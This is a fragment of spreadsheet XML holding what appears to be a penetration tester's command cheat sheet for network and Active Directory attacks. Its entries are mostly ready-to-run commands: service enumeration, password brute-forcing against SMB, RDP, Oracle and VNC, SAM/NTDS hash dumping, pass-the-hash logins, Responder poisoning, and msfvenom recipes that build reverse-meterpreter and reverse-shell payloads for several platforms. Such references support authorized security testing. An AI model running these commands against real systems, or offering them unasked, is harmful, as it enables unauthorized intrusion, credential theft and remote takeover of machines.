  </si>
  <si>
    <t>rpcclient -U "" $TARGET</t>
  </si>
  <si>
    <t>rpcinfo</t>
  </si>
  <si>
    <t>rpcclient</t>
  </si>
  <si>
    <t>nmap  --script=msrpc-enum $TARGET</t>
  </si>
  <si>
    <t>MSRPC</t>
  </si>
  <si>
    <t>nmap - rcp enum script</t>
  </si>
  <si>
    <t>python3 rpcdump.py test.local/john:password123@10.10.10.1</t>
  </si>
  <si>
    <t>Impacket’s rpcdump.py enumerates Remote Procedure Call (RPC) endpoints.</t>
  </si>
  <si>
    <t>add from https://wadcoms.github.io/</t>
  </si>
  <si>
    <t>https://www.hackingarticles.in/impacket-guide-smb-msrpc/</t>
  </si>
  <si>
    <t>add all entries from - https://pentestbook.six2dez.com.. so far got to rpc</t>
  </si>
  <si>
    <t>nmblookup -A $TARGET</t>
  </si>
  <si>
    <t>nmblookup</t>
  </si>
  <si>
    <t>enumerate the host using nmblookup</t>
  </si>
  <si>
    <t xml:space="preserve">ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]' </t>
  </si>
  <si>
    <t>ngrep</t>
  </si>
  <si>
    <t>Get Version using ngrep</t>
  </si>
  <si>
    <t>Get Version using smbclient</t>
  </si>
  <si>
    <t>smbclient -L \\\\$TARGET</t>
  </si>
  <si>
    <t>nmap - Enumerate SMB Shares</t>
  </si>
  <si>
    <t>nmap --script smb-enum-shares -p139,445 -T4 -Pn $TARGET</t>
  </si>
  <si>
    <t xml:space="preserve">medusa -h $TARGET  -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt </t>
  </si>
  <si>
    <t>Bruteforce passfor for a user - medusa</t>
  </si>
  <si>
    <t>smb scripts - alterantive</t>
  </si>
  <si>
    <t>Mound SMB on Linux</t>
  </si>
  <si>
    <t>mount -t cifs -o username=user,password=password //$TARGET/share /mnt/share</t>
  </si>
  <si>
    <t>winexe -U username //$TARGET "cmd.exe" --system</t>
  </si>
  <si>
    <t>winexe - run command over smb from linux</t>
  </si>
  <si>
    <t>winexe</t>
  </si>
  <si>
    <t>nmap --script smb-brute $TARGET</t>
  </si>
  <si>
    <t>bruteforce SMB with nmap</t>
  </si>
  <si>
    <t>nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $TARGET  -vvvv</t>
  </si>
  <si>
    <t>bruteforce SMB with nmap - specified wordlists</t>
  </si>
  <si>
    <t>smbclient.py [domain]/[user]:[password/password hash]@[Target IP Address]</t>
  </si>
  <si>
    <t>lookupsid.py [domain]/[user]:[password/password hash]@[Target IP Address]</t>
  </si>
  <si>
    <t>reg.py [domain]/[user]:[password:password hash]@[Target IP Address] [action] [action parameter]</t>
  </si>
  <si>
    <t>rpcdump.py [domain]/[user]:[Password/Password Hash]@[Target IP Address]</t>
  </si>
  <si>
    <t>samrdump.py [domain]/[user]:[Password/Password Hash]@[Target IP Address]</t>
  </si>
  <si>
    <t>services.py [domain]/[user]:[Password/Password Hash]@[Target IP Address] [Action]</t>
  </si>
  <si>
    <t>reg - access registry of larget</t>
  </si>
  <si>
    <t>lookupsid - enum sid users</t>
  </si>
  <si>
    <t>rpcdump - enum rpc</t>
  </si>
  <si>
    <t>samrdump - retrieve SAM</t>
  </si>
  <si>
    <t>service - access windows services</t>
  </si>
  <si>
    <t>Check for systems with SMB Signing not enabled</t>
  </si>
  <si>
    <t>python3 RunFinger.py -i 172.21.0.0/24</t>
  </si>
  <si>
    <t>RunFinger</t>
  </si>
  <si>
    <t>look for smb shares - file</t>
  </si>
  <si>
    <t>smbmap.py -u $USERNAME -p '$PASSWORD' -d $DOMAIN -x 'net group "Domain Admins" /domain' -H $TARGET</t>
  </si>
  <si>
    <t>Login with Creds - Execte command</t>
  </si>
  <si>
    <t>Login with Creds - Drive listing</t>
  </si>
  <si>
    <t>smbmap.py -H $TARGET -u $USERNAME -p '$PASSWORD' -L</t>
  </si>
  <si>
    <t>smbmap --host-file $TARGETFILE -P 445 | tee smb_smbmap.txt</t>
  </si>
  <si>
    <t>crackmapexec smb $TARGET -u $USERNAME -H $NTHASH --local --lsa</t>
  </si>
  <si>
    <t>Login with Hash and dump lsa</t>
  </si>
  <si>
    <t>snmp-check $TARGET -c public|private|community</t>
  </si>
  <si>
    <t>onesixtyone -c /usr/share/doc/onesixtyone/dict.txt $TARGET</t>
  </si>
  <si>
    <t>snmp-check</t>
  </si>
  <si>
    <t>onesixtyone</t>
  </si>
  <si>
    <t>check community strin using snmp-check</t>
  </si>
  <si>
    <t xml:space="preserve">bruteforce community </t>
  </si>
  <si>
    <t>nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $TARGET</t>
  </si>
  <si>
    <t>nmap $TARGET -Pn -sU -p 161 --script=snmp-brute,snmp-hh3c-logins,snmp-info,snmp-interfaces,snmp-ios-config,snmp-netstat,snmp-processes,snmp-sysdescr,snmp-win32-services,snmp-win32-shares,snmp-win32-software,snmp-win32-users</t>
  </si>
  <si>
    <t>enum scripts</t>
  </si>
  <si>
    <t>bruteforce and enum using nmap</t>
  </si>
  <si>
    <t>LDAP</t>
  </si>
  <si>
    <t>ldapsearch -h $TARGET -p 389 -x -b "dc=mywebsite,dc=com"</t>
  </si>
  <si>
    <t>python3 windapsearch.py --dc-ip $TARGET --users --full | tee windapsearch_users.txt</t>
  </si>
  <si>
    <t>ldapsearch</t>
  </si>
  <si>
    <t>windapsearch</t>
  </si>
  <si>
    <t>try enum ldap</t>
  </si>
  <si>
    <t>enum users via ldap</t>
  </si>
  <si>
    <t>ike-scan $TARGET</t>
  </si>
  <si>
    <t>https://wadcoms.github.io/</t>
  </si>
  <si>
    <t>enum IKE</t>
  </si>
  <si>
    <t>Rlogin</t>
  </si>
  <si>
    <t>rlogin -l root $TARGET</t>
  </si>
  <si>
    <t>rlogin</t>
  </si>
  <si>
    <t>connect to the host using rlogin</t>
  </si>
  <si>
    <t>MSSQL</t>
  </si>
  <si>
    <t>nmap -p 1433 -sU --script=ms-sql-info.nse $TARGET</t>
  </si>
  <si>
    <t>oscanner -s $TARGET -P 1521</t>
  </si>
  <si>
    <t>tnscmd10g version -h $TARGET</t>
  </si>
  <si>
    <t>tnscmd10g status -h  $TARGET</t>
  </si>
  <si>
    <t>Oracle</t>
  </si>
  <si>
    <t>osscanner</t>
  </si>
  <si>
    <t>tnscmd10g</t>
  </si>
  <si>
    <t>get version</t>
  </si>
  <si>
    <t>get status</t>
  </si>
  <si>
    <t>Enum oracle</t>
  </si>
  <si>
    <t>nmap -p 1521 --script=oracle-tns-version,oracle-sid-brute,oracle-brute $TARGET</t>
  </si>
  <si>
    <t>/odat-libc2.5-i686 all -s $TARGET -p 1521</t>
  </si>
  <si>
    <t>./odat-libc2.5-i686 sidguesser -s $TARGET -p 1521</t>
  </si>
  <si>
    <t>./odat-libc2.5-i686 passwordguesser -s $TARGET -p 1521 -d XE</t>
  </si>
  <si>
    <t>bruteforce sid</t>
  </si>
  <si>
    <t>bruteforce password</t>
  </si>
  <si>
    <t>all</t>
  </si>
  <si>
    <t>odat</t>
  </si>
  <si>
    <t>mount nfs share - nolock</t>
  </si>
  <si>
    <t>showmount -e $TARGET</t>
  </si>
  <si>
    <t>showmount</t>
  </si>
  <si>
    <t>enum nfs shares on target</t>
  </si>
  <si>
    <t>nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse $TARGET-p 3306</t>
  </si>
  <si>
    <t>enum scripts on mysql</t>
  </si>
  <si>
    <t>mysql --host=$TARGET -u root -p</t>
  </si>
  <si>
    <t>mysql</t>
  </si>
  <si>
    <t>Login to mysql with user and password</t>
  </si>
  <si>
    <t>rdesktop -u username -p password -g 85% -r disk:share=/root/ $TARGET</t>
  </si>
  <si>
    <t>login via RDP on Linux using rdesktop</t>
  </si>
  <si>
    <t>rdesktop</t>
  </si>
  <si>
    <t>rdesktop -u guest -p guest $TARGET -g 94%</t>
  </si>
  <si>
    <t>login via RDP as guest on Linux using rdesktop</t>
  </si>
  <si>
    <t>ncrack -vv --user Administrator -P $PASSLIST rdp://$TARGET</t>
  </si>
  <si>
    <t>bruteforce administrator password</t>
  </si>
  <si>
    <t>python crowbar.py -b rdp -s $TARGET -u admin -C $PASSLIST -v</t>
  </si>
  <si>
    <t>bruteforce admin password</t>
  </si>
  <si>
    <t>crowbar</t>
  </si>
  <si>
    <t>psql -h $TARGET -U postgres -W</t>
  </si>
  <si>
    <t>Postgres</t>
  </si>
  <si>
    <t>Login to postgres</t>
  </si>
  <si>
    <t>psql</t>
  </si>
  <si>
    <t>VNC</t>
  </si>
  <si>
    <t>bruteforce VNC password with nmap</t>
  </si>
  <si>
    <t>WinRM</t>
  </si>
  <si>
    <t>evil-winrm -i $TARGET -u $USERNAME  -p '$PASSWORD'</t>
  </si>
  <si>
    <t>login via winrm</t>
  </si>
  <si>
    <t>evil-winrm</t>
  </si>
  <si>
    <t>evil-winrm -i $TARGET -u $USERNAME -H '$HASH' -s /scripts/folder</t>
  </si>
  <si>
    <t>login via winrm using hash</t>
  </si>
  <si>
    <t>rsh &lt;IP&gt; -l domain\user &lt;Command&gt;</t>
  </si>
  <si>
    <t>rsh &lt;IP&gt; &lt;Command&gt;</t>
  </si>
  <si>
    <t>rsh</t>
  </si>
  <si>
    <t>nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 $TARGET</t>
  </si>
  <si>
    <t>ISCSI</t>
  </si>
  <si>
    <t>nmap -sV --script=iscsi-info -p 3260 $TARGT</t>
  </si>
  <si>
    <t>nmap scripts - iscsi info</t>
  </si>
  <si>
    <t>xfreerdp</t>
  </si>
  <si>
    <t>X11</t>
  </si>
  <si>
    <t>nmap -sV --script x11-access -p &lt;PORT&gt; &lt;IP&gt;</t>
  </si>
  <si>
    <t>nmap - x11 scripts</t>
  </si>
  <si>
    <t>smb_version</t>
  </si>
  <si>
    <t>smb enumeration modules</t>
  </si>
  <si>
    <t>msfconsole -x "spool smb-msf.txt;setg RHOSTS file://$TARGET;setg RPORT 445;setg THREADS 10;use auxiliary/scanner/smb/smb_enum_gpp;info;run;use auxiliary/scanner/smb/smb_enumshares;info;set ShowFiles true;run;use auxiliary/scanner/smb/smb_enumusers;info;run;use auxiliary/scanner/smb/smb_enumusers_domain;info;run;use auxiliary/scanner/smb/smb_lookupsid;info;run;use auxiliary/scanner/smb/smb_ms17_010;set CHECK_PIPE True;info;run;use auxiliary/scanner/smb/smb_uninit_cred;set PASSIVE true;info;run;use auxiliary/scanner/smb/smb_version;info;run;spool off"</t>
  </si>
  <si>
    <t>msfconsole -x "spool smb-msf-ver.txt;setg RHOSTS file://$TARGET;setg THREADS 10;setg RPORT 445;use auxiliary/scanner/smb/smb_version;info;run;spool off"</t>
  </si>
  <si>
    <t>bash</t>
  </si>
  <si>
    <t>Linux</t>
  </si>
  <si>
    <t>setup targets.txt</t>
  </si>
  <si>
    <t>set excludes.txt &amp; EXCLUDES variable</t>
  </si>
  <si>
    <t>nano targets.txt &amp;&amp; cat targets.txt &gt; temp 2&gt;/dev/null &amp;&amp; cat targets.txt 2&gt;/dev/null | tr -d " \t\r" | sed '/^$/d' | tee targets.txt &amp;&amp; rm temp 2&gt;/dev/null &amp;&amp; export TARGET=$(realpath targets.txt)</t>
  </si>
  <si>
    <t>ip a | grep inet | awk '{ print $2}' | cut -d'/' -f1 | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" &gt;&gt; excludes.txt &amp;&amp; nano excludes.txt &amp;&amp; cat excludes.txt &gt; temp 2&gt;/dev/null &amp;&amp; cat temp 2&gt;/dev/null | tr -d " \t\r" | sed '/^$/d' | sort -u | tee excludes.txt &amp;&amp; rm temp 2&gt;/dev/null &amp;&amp; export EXCLUDE=$(realpath excludes.txt)</t>
  </si>
  <si>
    <t>screen -L -Logfile nmap_tcp_full.log -d -m -S nmap-tcp-full nmap -vvv --stats-every 20s -sSV -Pn -p0- -T4  -oA nmap_tcp_full -iL $TARGET --excludefile $EXCLUDE</t>
  </si>
  <si>
    <t>screen -L -Logfile nmap_udp_def.log -d -m -S nmap-udp-def nmap -vvv --stats-every 20s -sU -Pn -n -T4 -oA nmap_udp_def -iL $TARGET --excludefile $EXCLUDE</t>
  </si>
  <si>
    <t>httpx</t>
  </si>
  <si>
    <t>httpx --silent --title -verbose -web-server -follow-redirects -vhost -retries 5 -l urls.txt -o httpx.txt</t>
  </si>
  <si>
    <t xml:space="preserve">quickly check url list get server header </t>
  </si>
  <si>
    <t>httpx --silent --title -verbose -web-server -follow-redirects -store-response-dir httpx -store-response -l urls1.txt -o httpx.txt</t>
  </si>
  <si>
    <t xml:space="preserve">grab the HTTP responses in httpx folder </t>
  </si>
  <si>
    <t>https://githubmemory.com/repo/H0j3n/EzpzCheatSheet</t>
  </si>
  <si>
    <t>wget -m --no-passive ftp://anonymous:anonymous@$TARGET</t>
  </si>
  <si>
    <t>wget</t>
  </si>
  <si>
    <t>check for anonymouse with wget</t>
  </si>
  <si>
    <t>nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $TARGET -oA nmap_smb | tee nmap_smb.log</t>
  </si>
  <si>
    <t>https://www.blackhillsinfosec.com/a-toast-to-kerberoast/</t>
  </si>
  <si>
    <t>fingerprint - single URL</t>
  </si>
  <si>
    <t>fingerprint - urls file (parallel)</t>
  </si>
  <si>
    <t>Check WAF on file  (parallel)</t>
  </si>
  <si>
    <t>parallel --bar --eta -a $TARGETFILE 'wafw00f -v -a {} | tee wafw00f_$(echo {}| cut -d'/' -f3 | tr -d ^ | tr % - | tr : -).txt'</t>
  </si>
  <si>
    <t>parallel --bar --eta -a $URLFILE 'whatweb {} --aggression=3 --verbose | tee whatweb_$(echo {}| cut -d'/' -f3 | tr -d ^ | tr % - | tr : -).txt'</t>
  </si>
  <si>
    <t xml:space="preserve">screen -L -Logfile nmap_http_scripts.log -d -m -S nmap-tcp-script nmap -v -Pn -oA nmap_http_scripts -sV -T4 --script="http-vuln*,http-passwd,http-meth*,http-apache*,http-aspnet-debug,http-aut*,http-cookie-flags,http-cross-domain-policy,http-config-backup,http-trac*,http-php-version,http-jsonp-detection,http-default-accounts,http-enum,http-errors,http-ii*,http-internal-ip-disclosure,http-open-redirect,http-open-proxy,http-mcmp,http-phpself-xss,http-comments-displayer,http-csrf,http-exif-spider,http*heade*,http-robots.txt,http-title,http-vhosts,http-waf*,ip-https-discover*,http-webdav-scan,http-grep" -p80,443,8080 $TARGET </t>
  </si>
  <si>
    <t>cutycapt --url=$URL --out=$(echo $URL| cut -d'/' -f3 | tr -d ^ | tr % - | tr : -).jpg</t>
  </si>
  <si>
    <t xml:space="preserve">TestSSL on url </t>
  </si>
  <si>
    <t>SSLScan on url</t>
  </si>
  <si>
    <t>dirbrute multiple urls into single outputfile</t>
  </si>
  <si>
    <t>securityheaders</t>
  </si>
  <si>
    <t>https://github.com/koenbuyens/securityheaders</t>
  </si>
  <si>
    <t>check security headers on a url list - csv</t>
  </si>
  <si>
    <t>python securityheaders.py urls.txt --flatten  --formatter csv | tee security-headers.csv</t>
  </si>
  <si>
    <t>Vmware</t>
  </si>
  <si>
    <t>ESXi fingerprint version</t>
  </si>
  <si>
    <t xml:space="preserve">msfconsole -q -x "spool msf_vmwareesxi.txt;use auxiliary/scanner/vmware/esx_fingerprint;setg RHOSTS file:////parse/hosts/tcp_443-https.txt; run" </t>
  </si>
  <si>
    <t>dump DOAMIN  windows hashes - NTDS.dit</t>
  </si>
  <si>
    <t>secretsdump.py -sam $(ls | grep -i sam | head -1) -system $(ls | grep -i system | head -1) -security $(ls | grep -i security | head -1) LOCAL -outputfile dump-local.txt</t>
  </si>
  <si>
    <t>secretsdump.py sam $(ls | grep -i sam | head -1) -system $(ls | grep -i system | head -1) -security $(ls | grep -i security | head -1) CACHED -outputfile dump-cached.txt</t>
  </si>
  <si>
    <t>nmap mssql scripts</t>
  </si>
  <si>
    <t>wpscan</t>
  </si>
  <si>
    <t xml:space="preserve"> wpscan --url $URL | tee wpscan.txt</t>
  </si>
  <si>
    <t>Wab</t>
  </si>
  <si>
    <t>Basic wpscan</t>
  </si>
  <si>
    <t>wpscan -v -e ap, at, tt, cb, dbe, u, m --url $URL | tee wpscan.txt</t>
  </si>
  <si>
    <t>Wordpress</t>
  </si>
  <si>
    <t>AD</t>
  </si>
  <si>
    <t>get stats on a list of dumped passwords (non uninqe)</t>
  </si>
  <si>
    <t>pipil</t>
  </si>
  <si>
    <t>ruby /tools/pipal/pipal.rb $FILE</t>
  </si>
  <si>
    <t>variable</t>
  </si>
  <si>
    <t>URL</t>
  </si>
  <si>
    <t>set the URL variable</t>
  </si>
  <si>
    <t>URLFILE</t>
  </si>
  <si>
    <t>set the URLFILE variable</t>
  </si>
  <si>
    <t>export URLFILE=$(realpath urls.txt)</t>
  </si>
  <si>
    <t>IP</t>
  </si>
  <si>
    <t>set IP</t>
  </si>
  <si>
    <t>export URL="https://test.com"</t>
  </si>
  <si>
    <t>export IP="192.168.0.1"</t>
  </si>
  <si>
    <t>IPFILE</t>
  </si>
  <si>
    <t>set the IPFILE variable</t>
  </si>
  <si>
    <t>export IPFILE=$(realpath targets.txt)</t>
  </si>
  <si>
    <t>nmap -sn -T4--traceroute --reason -oA nmap/ping -iL $IPFILE</t>
  </si>
  <si>
    <t>cat "$URLFILE"| aquatone -scan-timeout 800 -http-timeout 7000 -out aquatone</t>
  </si>
  <si>
    <t>eyewitness -f "$TARGETFILE" --all-protocols --max-retries 5 --timeout 20 --active-scan --no-prompt -d eyewitness</t>
  </si>
  <si>
    <t>screen -d -m -S nikto parallel --bar --eta -a "$URLFILE" 'nikto -C all -h {} | tee nikto_$(echo {}| cut -d'/' -f3 | tr -d ^ | tr % - | tr : -).txt'</t>
  </si>
  <si>
    <t>SSLFILE</t>
  </si>
  <si>
    <t>set the SSLFILE variable</t>
  </si>
  <si>
    <t>export SSLFILE=$(realpath ssl.txt)</t>
  </si>
  <si>
    <t>mkdir ssl 2&gt;/dev/null &amp;&amp; screen -d -m -S testssl parallel --bar --eta -a "$SSLFILE" '/tools/testssl.sh/testssl.sh -p -h -U -S --warnings off --hints -oL ssl/testssl_$(echo {}| cut -d'/' -f3 | tr -d ^ | tr % - | tr : -).txt {}'</t>
  </si>
  <si>
    <t>mkdir ssl 2&gt;/dev/null &amp;&amp; screen -d -m -S sslscan parallel --bar --eta -a "$SSLFILE" 'sslscan --show-certificate {} | tee sslscan_$(echo {}| cut -d'/' -f3 | tr -d ^ | tr % - | tr : -).txt'</t>
  </si>
  <si>
    <t>parallel -a "$IPFILE" 'shodan host {} | tee -a shodan.txt'</t>
  </si>
  <si>
    <t xml:space="preserve">whatweb  --aggression=3 --verbose -i "$URLFILE" | tee whatweb.txt </t>
  </si>
  <si>
    <t>screen -d -m -S gobuster parallel --bar --eta -a $URLFILE 'parallel --bar --eta -a "$URLFILE" 'gobuster dir -q -e -f -w "$WORDLIST"  -k -o gobuster.txt -u {} --wildcard'</t>
  </si>
  <si>
    <t xml:space="preserve">wpscan check everything </t>
  </si>
  <si>
    <t>Get-ADUser -Filter (ServicePrincipalName -ne $null) -Properties ServicePrincipalName</t>
  </si>
  <si>
    <t xml:space="preserve">idenfity kerberoatable accounts </t>
  </si>
  <si>
    <t>Powershell</t>
  </si>
  <si>
    <t>nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'</t>
  </si>
  <si>
    <t>nmap - brutefore kerberoast</t>
  </si>
  <si>
    <t>dig on a subdomains file</t>
  </si>
  <si>
    <t>parallel -a subdomains.txt 'dig @8.8.8.8 {} any | tee -a dig-subdomains.txt'</t>
  </si>
  <si>
    <t xml:space="preserve">xfreerdp /u:[domain\]&lt;username&gt; /p:&lt;password&gt; /v:&lt;IP&gt;:&lt;PORT&gt;  +clipboard /dynamic-resolution                 </t>
  </si>
  <si>
    <t>login via RDP using xfreerdp - dynamic red</t>
  </si>
  <si>
    <t>setspn -T medin -Q ​ */*</t>
  </si>
  <si>
    <t>Extract accounts in the SPN - native</t>
  </si>
  <si>
    <t>when open fresh - clear filters</t>
  </si>
  <si>
    <t>Parsing</t>
  </si>
  <si>
    <t>grep</t>
  </si>
  <si>
    <t>grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"</t>
  </si>
  <si>
    <t>grep IPv6 Address only</t>
  </si>
  <si>
    <t>grep -oE --color "(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))"</t>
  </si>
  <si>
    <t>grep IPv4 Address only</t>
  </si>
  <si>
    <t>grep -Eo "(http|https)://[a-zA-Z0-9./?=_%:-]*"</t>
  </si>
  <si>
    <t>grep URL only</t>
  </si>
  <si>
    <t>Bash</t>
  </si>
  <si>
    <t xml:space="preserve">parse the run finger output to csv </t>
  </si>
  <si>
    <t>runfinger</t>
  </si>
  <si>
    <t>cat enum/smb/smb_runfinger.txt | sort -u | cut -d'[' -f3- | cut -d']' -f1 | tr -d \' &gt; runfinger.csv</t>
  </si>
  <si>
    <t xml:space="preserve">os discovery using input file </t>
  </si>
  <si>
    <t>/usr/share/responder/tools/RunFinger.py -f targets.txt | tee -a smb_runfinger.txt</t>
  </si>
  <si>
    <t xml:space="preserve">screen -L -Logfile responder.log -d -m -S responder responder -A -I eth0 </t>
  </si>
  <si>
    <t>responder</t>
  </si>
  <si>
    <t xml:space="preserve">Responder - in analysis mode </t>
  </si>
  <si>
    <t>parallel -a tcp-22-ssh.txt 'ssh-audit -v -T {} | tee ssh-audit_{}.txt'</t>
  </si>
  <si>
    <t>run on targets list - using parallel</t>
  </si>
  <si>
    <t>parallel -a  $TARGETFILE  'nmap -n -vv --reason -PE -PM -PS21,22,23,25,26,53,80,81,110,111,113,135,139,143,179,199,443,445,465,514,548,554,587,993,995,1025,1026,1433,1720,1723,2000,2001,3306,3389,5060,5900,6001,8000,8080,8443,8888,10000,32768,49152 -PA21,80,443,13306 -PU {} -oA nmap_advping_$(echo {} | cut -d'/' -f1)' | tee nmap_advping.log</t>
  </si>
  <si>
    <t>scrying -v --output scrying --rdp-timeout 8 --threads 3 -m rdp -f tcp_3389-rdp.txt | tee scrying.log</t>
  </si>
  <si>
    <t>scrying</t>
  </si>
  <si>
    <t xml:space="preserve">screenshot RDP using scrying. slow </t>
  </si>
  <si>
    <t>nmap -iL ../../ranges.txt -p445 -sV --script=smb-enum-shares -oA nmap_smb_shares</t>
  </si>
  <si>
    <t>nmap check smb shares</t>
  </si>
  <si>
    <t>nmap ldap scripts. no bruting</t>
  </si>
  <si>
    <t>nmap -p389,3269,3268,636 -iL targets.txt -oA nmap_ldap -n -sV --script "ldap* and not brute" | tee nmap_ldap.log</t>
  </si>
  <si>
    <t>Network</t>
  </si>
  <si>
    <t>tshark</t>
  </si>
  <si>
    <t>sniff the network using tshark</t>
  </si>
  <si>
    <t>screen -L -d -m -S tshark tshark -i eth0 -x -V -w tshark.pcap</t>
  </si>
  <si>
    <t xml:space="preserve">bruteforce gnmap file user and pass file </t>
  </si>
  <si>
    <t>Wireshark</t>
  </si>
  <si>
    <t xml:space="preserve">filter FTP and not my ip </t>
  </si>
  <si>
    <t>ftp and not ip.addr == $KALI_IP</t>
  </si>
  <si>
    <t>MSF- postgres version on files</t>
  </si>
  <si>
    <t>msfconsole -x "spool postgres-msf-version.txt;setg RHOSTS file://$TARGETFILE;setg RPORT 5432;use auxiliary/scanner/postgres/postgres_version;info;run"</t>
  </si>
  <si>
    <t>msfconsole -x "spool postgres-msf-login.txt;setg RHOSTS file://$TARGET;setg RPORT 5432;use auxiliary/scanner/postgres/postgres_login;info;run"</t>
  </si>
  <si>
    <t>MSF - postgres bruteforce file - default</t>
  </si>
  <si>
    <t>mssql_ping on file</t>
  </si>
  <si>
    <t>msfconsole -x "spool mssql-msf-ping;setg RHOSTS file://$TARGETFILE;setg RPORT 1433;use auxiliary/scanner/mssql/mssql_ping;info;run"</t>
  </si>
  <si>
    <t>msfconsole -x "spool mssql-msf-login;setg RHOSTS file://$TARGETFILE;setg RPORT 1433;use auxiliary/scanner/mssql/mssql_login;info;run"</t>
  </si>
  <si>
    <t>mssql login on file - using defaults</t>
  </si>
  <si>
    <t>nmap -oA nmap_smtp.log --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $TARGET | tee nmap_smtp.log</t>
  </si>
  <si>
    <t>run ALL nmap scripts</t>
  </si>
  <si>
    <t>nmap --script=smtp* -oA map_smtp2 -sV -p 25,587 $TARGET| tee nmap_smtp2.log</t>
  </si>
  <si>
    <t>parallel --bar --eta -a $TARGETFILE 'enum4linux -a -R 490-560,900-180 {} | tee enum4linux_{}.txt' | tee -a enum4linux.log</t>
  </si>
  <si>
    <t>nmap --script=vnc-info,vnc-brute,vnc-title -sV -p 5900 $TARGET</t>
  </si>
  <si>
    <t>parse users from enum4linux</t>
  </si>
  <si>
    <t>grep 'user:\['  enum4linux*  | cut -d'[' -f2 | cut -d']' -f1</t>
  </si>
  <si>
    <t>Active</t>
  </si>
  <si>
    <t xml:space="preserve">screen -L -Logfile responder2.log -d -m -S responder responder -I eth0 </t>
  </si>
  <si>
    <t>Responder - in Active mode.. BE CAREFUL</t>
  </si>
  <si>
    <t>check if webdav is enabled</t>
  </si>
  <si>
    <t>nmap -T4 -sV --script=http-iis-webdav-vuln -oN nmap_webdav --script-args=webdavfolder=/a/ -p49266 $TARGET | tee nmap_webdav.log</t>
  </si>
  <si>
    <t>AWS</t>
  </si>
  <si>
    <t>GCP</t>
  </si>
  <si>
    <t>davtest</t>
  </si>
  <si>
    <t>davtest -url http://$TARGET:$PORT</t>
  </si>
  <si>
    <t>nmap all ssh scripts</t>
  </si>
  <si>
    <t>nmap  -sV --script=ssh* -T4 -oA nmap_ssh -p22 $TARGET | tee nmap_ssh.log</t>
  </si>
  <si>
    <t>msfvenom</t>
  </si>
  <si>
    <t>list payloads</t>
  </si>
  <si>
    <t>msfvenom -l</t>
  </si>
  <si>
    <t xml:space="preserve">linux reverse meterpreter </t>
  </si>
  <si>
    <t>windows reverse meterpreter</t>
  </si>
  <si>
    <t>mac reverse meterpreter</t>
  </si>
  <si>
    <t>php reverse meterpreter</t>
  </si>
  <si>
    <t>asp reverse meterpreter</t>
  </si>
  <si>
    <t xml:space="preserve">jsp reverse meterpreter </t>
  </si>
  <si>
    <t>war reverse meterpreter</t>
  </si>
  <si>
    <t>python</t>
  </si>
  <si>
    <t>perl</t>
  </si>
  <si>
    <t>linux based shellcode</t>
  </si>
  <si>
    <t xml:space="preserve">windows based shell code </t>
  </si>
  <si>
    <t xml:space="preserve">mac based shelll code </t>
  </si>
  <si>
    <t>check for webdav</t>
  </si>
  <si>
    <t>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$LHOST&gt; LPORT=$LPORT -f elf &gt; shell.elf</t>
  </si>
  <si>
    <t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f exe &gt; shell.exe</t>
  </si>
  <si>
    <t>msfvenom -p osx/x86/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f macho &gt; shell.macho</t>
  </si>
  <si>
    <t>msfvenom -p php/meterpreter_reverse_tcp LHOST=$LHOST LPORT=$PORT -f raw &gt; shell.php &amp;&amp; cat shell.php | pbcopy &amp;&amp; echo '&lt;?php ' | tr -d '\n' &gt; shell.php &amp;&amp; pbpaste &gt;&gt; shell.php</t>
  </si>
  <si>
    <t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$PORT -f asp &gt; shell.asp</t>
  </si>
  <si>
    <t>msfvenom -p java/jsp_shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f raw &gt; shell.jsp</t>
  </si>
  <si>
    <t>msfvenom -p java/jsp_shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f war &gt; shell.war</t>
  </si>
  <si>
    <t>msfvenom -p cmd/unix/reverse_python LHOST=$LHOST LPORT=$LPORT -f raw &gt; shell.py</t>
  </si>
  <si>
